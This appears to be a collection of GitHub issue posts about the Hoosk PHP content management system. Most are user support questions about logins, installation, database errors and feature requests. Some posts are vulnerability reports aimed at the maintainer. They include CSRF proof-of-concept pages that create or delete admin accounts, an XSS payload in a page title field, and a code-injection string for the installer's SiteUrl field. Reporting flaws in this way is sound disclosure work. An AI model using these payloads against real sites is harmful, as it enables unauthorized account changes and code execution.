Hello. I want to report it has CSRF issue in admin pages.
When attacker induce authenticated admin user to a malicious web page, the account will be created without admin user's intention.

Here is how to reproduce the issue.
1. Login to admin page.(/admin)
2. Keep login and access the html it has following content

<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="http://your.content.example.com" method="POST">
     <input type="hidden" name="username" value="test1" />
     <input type="hidden" name="email" value="test1&#64;example&#46;com" />
     <input type="hidden" name="password" value="test" />
     <input type="hidden" name="con&#95;password" value="test" />
     <input type="hidden" name="submit" value="Save" />
     <input type="submit" value="Submit request" />
   </form>
 </body>
</html>

2. And account username = test1 is created without admin user's intention.

Hi,
When I use the sirTrevor list block, this will not work. I can just input some text.

I have made so far some research on this but I can not find anything which could help.
I just could find this example "http://madebymany.github.io/sir-trevor-js/example.htm" and this one is working.

Any idea

Regards

I have successfully installed hoosk on my server. No problems happened, I can login to the admin page.

However, after I moved it to another server (with the same specs), I can not login to the admin page.
There are no error messages, but can not log in to the admin page.
If you use the wrong username / password, then an error message appears.

I've tried various things, including deleting the value in $ config ["cookie_domain"], truncate the session table, but still nothing changes.

is it any idea for this..?

it's possible

Can not save and update to post or pages Hoosk Version 1.5.6, do notice All fields marked with * are required!, when all the forms have been filled. tq
screenshot http://imgh.us/save_2.jpg

I installed hoosk and this "installation completed" page came up with a login button, but clicking on that button > "This site can’t be reached demohoosk’s server DNS address could not be found." Page is lost
what i did wrong? i'm a beginner please do help

Hi,

nice project - just downloaded it and playing around. Looks very cool!

What do you think about having a published flag (yes/no) for posts as well? Also it would be great to have this flag shown in the overview table of pages/posts to easily see which pages/posts are published.

Regards
miscs

I understand that you have to put it in sir-trevor.js, but I'm not expert with javascript :(

<!DOCTYPE html>
<html>
  <head>
    <meta name="viewport" content="initial-scale=1.0, user-scalable=no">
    <meta charset="utf-8">
    <title>Simple markers</title>
    <style>
      html, body {
        height: 100%;
        margin: 0;
        padding: 0;
      }
      #map {
        height: 100%;
      }
    </style>
  </head>
  <body>
    <div id="map"></div>
    <script>

      function initMap() {
        var myLatLng = {lat: -25.363, lng: 131.044};

        var map = new google.maps.Map(document.getElementById('map'), {
          zoom: 4,
          center: myLatLng
        });

        var marker = new google.maps.Marker({
          position: myLatLng,
          map: map,
          title: 'Hello World!'
        });
      }
    </script>
    <script async defer
    src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY&callback=initMap">
    </script>
  </body>
</html>

Hello
First, thank you for sharing Hoosk. I have a very limited shared hosting account, question:
1.- Does Hoosk can run on SQLite instead of MySQL?
2.- Your last version is dated 25/04/2017, when will the next version be available?
Thanks and regards
Jose

Is it possible to add in an editor for text with font control etc.. rather than just have a blank box.

What version do you used ?
im trying in php7.
cant login i think the problem with cookie or session

Base_url() Navigation does not work.
On the front page the header menu does not point to base_url()

I posted more than 100 dummy posts,
Now i have difficulties to find some post and i didn't see any search feature.

And then the pagination buttons looks very primitive, can you style it?

Thank you

Regards,
Git

I'm trying to install hoosk on a subfolder in my site www.example.com/subfolder but links on the admin menu point to www.example.com/admin. Is there a configuration to fix this?

Hi, I know it's a very tiny issue.
Current code:
jQuery('#datetimepicker').datetimepicker({ format:'m/d/Y H:m:s' });.
According to API, I think it should be:
jQuery('#datetimepicker').datetimepicker({ dateFormat:'m/d/Y H:m:s' });.

Thx again for your amazing framework.

So, the problem occured when I try to save the content (in news, pages, etc). After I click save button, then the page is not working.

is there any idea for this..?

Hello,

How can I upload Site Logo with SVG files in Dashboard?

Than you!

the xss is on the page 'admin/pages/new'，add a text new page, fill the <img src=1 onerror=alert(1)> in the 'Navigation Title* (this is displayed on navigation menus)' field

Hi ,
I have a problem with Hoosk CMS
when i added a new page it give me that error

A Database Error Occurred
Error Number: 1364

Field 'pageParent' doesn't have a default value

INSERT INTO hoosk_page_attributes (pagePublished, pageTemplate, pageURL) VALUES ('1', 'page', 'thisisalopage')

Filename: C:/wamp/www/Hoosk/hoosk/hoosk0/models/Hoosk_model.php

Line Number: 228

How to use 2 languages?

With regards to the above , i cannot login with default username admin and password h00sk

Any hints ?

hi,
is there any reason why you do not use unique collums in the database ( for some tables ) ?

without unique collums is it complicated to manual edit the pages (phpmyadmin for example)
also it is not possible yet to add colors and rich html text to the pages with out manual editing the database

can you fix the unique collums in the database please ?
its located in content and navigation

i also use version 1.4 as 1.5 refuse to work ( admin arena )

also it would be nice to include a small tutorial how to make custom pages like a contact form , as that does not exist yet ( exept the news.php page )

iframe does also NOT work , as soon you put a iframe in it it fails to safe and it also fails to work like it need to be

after beein used to this system is it still a nice system , but it is heavy limited at this moment for full use :(

Greets From PowerChaos

Couple of issues after setting up, I am unable to login with the supplied username and passwords, resetting doesn't send any links to reset, digging deep and get the way is creates the links and doing it that way and resetting said password still nothing.

I cannot figure out the way to embed a tweet.

I'm trying to instal Hoosk, I get this:
Fatal error: Uncaught Error: Call to undefined function mysql_connect()...

after installing hoosk i cant get the access to the admin the error is
The requested URL /admin was not found on this server
please help thanks in advance
server specs
ubuntu 16.04
apache2.4
php 5.6

hi,
i got a fresh install of hoosk 1.5 but after install the admin arena only displays a white page
on same config i installed version 1.4 and then the admin arena works perfect

also few suggestions
installer still works with mysql instead mysqli/pdo
so it trows out errors xD

Greets From PowerChaos

This is a great CMS! I mean seriously.

I need some advices on how to add/delete or edit the Navigation menu. The Navigation module seems not working as expected. I tried to add a new menu after creating a page but nothing happen (but it is working in the demo site http://demo.hoosk.org/).

Adding a new Navigation also not working (also not working in demo site as well).

Also, the default menu - News and Contact won't disappear after deleting the demo page - News and Contact. A new menu name will appear in the drop down option after creating a new page and can be added to the menu list but it will disappear again after clicking the save button.

Would appreciate if you could help on this. Thank you.

Does Hoosk work in apache vhost ? where each vhost has its own webroot ?

http://beta.hoosk.org/category/uncategorized-asd/10

There are error when post is about more than 10 in a category

when i press button next it will go to error page

Do you have any plans to provide JSON output as well?

Maybe like http://hoosk.org/json/article/hoosk-15-update--rss-feeds-and-more

hey,bro.I find that you didn't fix the #47.And there is an other XSS.

I have learned a lot from your code,thank you.

Hi,bro.I also find an csrf issue in admin page.

When attacker induce authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention.

how to reproduce the issue.

1. Login to admin page.(/admin)
2. Keep login and access the html it has following content

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.hoosk.org/admin/users/delete/userid" method="POST">
      <input type="hidden" name="deleteid" value="userid" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

userid is very easy to guess.

3.And account userid = userid is delete without admin user's intention.

how to fix this issue.
set csrf token to protect delete function.

Another nice feature to have would be page/post versioning. Once the page/post is published the version is freezed and edit creates a new version of this page/post.

I love Hoosk!

Trying to use it on my first 'real' website and have to use it with an SSL installed. Changed the root domain to include https which corrected lots of insecure resource warnings, but now I can't log in as the admin user. Is that a real bug?

Error Number: 1364

Field 'RS' doesn't have a default value

INSERT INTO hoosk_user (userName, email, password) VALUES ('test', '[email protected]', '22d61613a8f7120dff19ee54ac97ac48')

Filename: C:/wamp64/www/test/hoosk/hoosk0/models/Hoosk_model.php

Line Number: 128

and i try import manual the sql file to my phpmy admin

I am already install your CMS in our localhost, but we found some trouble after login. Session login lost after success login. I already solved this issue, Please change your config.php

from
$config['cookie_domain'] = ".".EMAIL_URL;
to
$config['cookie_domain'] = $_SERVER['SERVER_NAME'];

Thank You
warm regard
Zani

When install the Hoosk，you can put the code ')phpinfo();// in the SiteUrl,then,visit the /config.php,you can get the phpinfo page.

Got an error message when select an image from jumbotron content editor and the file is not uploaded any where. However its give us error message which is "There was a problem with your upload"
So please fixed it
I hope you guys are do the needful help.

I'm running an apache server with a new Hoosk installation behind a reverse proxy.
All requests are redirected to https. After installation I needed to manually change the BASE_URL in the generated config.php file because http was saved in the file.
So, the front-end is working currently... everything fine.

But I'm not able to display the admin page. When I login, Hooks returns me an empty page.
Can I see some log files or errors for hooks?
Does someone maybe know how to fix this and tell me if this problem is related to the reverse proxy?

Current Theme:

A PHP Error was encountered

Severity: Warning

Message: Invalid argument supplied for foreach()

Filename: admin/settings.php

Line Number: 83

Backtrace:

File: C:\xampp\htdocs\hoosk\hoosk\hoosk0\views\admin\settings.php
Line: 83
Function: _error_handler

File: C:\xampp\htdocs\hoosk\hoosk\hoosk0\core\MY_Loader.php
Line: 128
Function: include

File: C:\xampp\htdocs\hoosk\hoosk\hoosk0\controllers\admin\Admin.php
Line: 115
Function: view

File: C:\xampp\htdocs\hoosk\index.php
Line: 306
Function: require_once

Plus the favicon is missing as well

I have just successfully installed the cms.

The welcome page say:

Login details:
Username - demo
Password - h00sk

Unfortunately this is not working. Also having a look at the database I see that the username in the user table is "admin" and not "demo".

Also using "admin" as username would give an error.

Which credential must to be used to access the CMS.

I appreciate your help with this issue.

Franco

Are tags on the feature roadmap?

I am installing Hoosk onto my local machine and working from 127.0.0.1/example

however, all of your relative links are not working correctly... they are reverting the url back to just 127,0,0,1 without the folder name at the end? anyway to fix this?

I copied Hoosk to the /var/www/html directory and run installing , every thing seemed ok, but when it finished installing, I clicked the login button, it printed 404 not found the /admin url ... how could I fix it? Thank you！

Hi, my first post at github.

I was translating the dashboard step by step through your tutorial, but the dashboard always displayed in english.
Found out that there's a backslash at the end of each language name in the setting page(and in the database, of course, ex. 'english\', 'traditional_chinese\').
This might cause problem when Lang.php(hoosk\system\core\Lang.php) preg_match the string around line 110.
I currently change the match pattern from
preg_match('/^[a-z_-]+$/i', $idiom)
to
preg_match('/^[a-z_-]+(\\\\)*$/i', $idiom), and it works so far.
Thx for the great framework!

Hi, How to make mail smtp settings?
System > Libraries > email.php I am editing, not working.

public $mailpath = '/usr/sbin/smtp'; // Sendmail path
public $protocol = 'smtp';
public $smtp_host = 'smtp.sitehost.com';
public $smtp_user = '[email protected]';
public $smtp_pass = 'mypass';
public $smtp_port = 465;
public $smtp_timeout = 5;
public $smtp_crypto = 'ssl';

Can you tell me about gmail or others? Thanks.